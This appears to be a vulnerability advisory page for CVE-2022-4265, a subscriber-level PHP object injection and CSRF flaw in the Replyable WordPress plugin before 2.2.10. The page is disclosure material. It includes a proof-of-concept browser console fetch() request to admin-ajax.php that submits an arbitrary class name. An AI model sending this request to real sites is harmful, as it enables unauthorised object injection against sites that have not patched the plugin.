Lucene search
Lana CodesWPEX-ID:095CBA08-7EDD-41FB-9776-DA151C0885DDHistoryFeb 08, 2023 - 12:00 a.m.
Replyable < 2.2.10 - Subscriber+ PHP Object Injection
2023-02-0800:00:00
Lana Codes
33
replyable
php
object injection
subscriber+
exploit
web browser
developer console
blog
wpscan.
0.001 Low
EPSS
Percentile
36.6%
The plugin does not validate the class name submitted by the request when instantiating an object in the prompt_dismiss_notice action and also lacks CSRF check in the related action. This could allow any authenticated users, such as subscriber to perform Object Injection attacks. The attack could also be done via a CSRF vector against any authenticated user
Run the below command in the developer console of the web browser while being on the blog as a subscriber user
fetch('http://wpscan.local/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=prompt_dismiss_notice&class=Malicious'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));Related
cve
cve
CVE-2022-4265
2023-03-06 14:15:09
wpvulndb
wpvulndb
Replyable < 2.2.10 - Subscriber+ PHP Object Injection
2023-02-08 00:00:00
nvd
nvd
CVE-2022-4265
2023-03-06 14:15:09
prion
prion
Cross site request forgery (csrf)
2023-03-06 14:15:00
cvelist
cvelist
CVE-2022-4265 Replyable < 2.2.10 - Subscriber+ PHP Object Injection
2023-03-06 13:33:59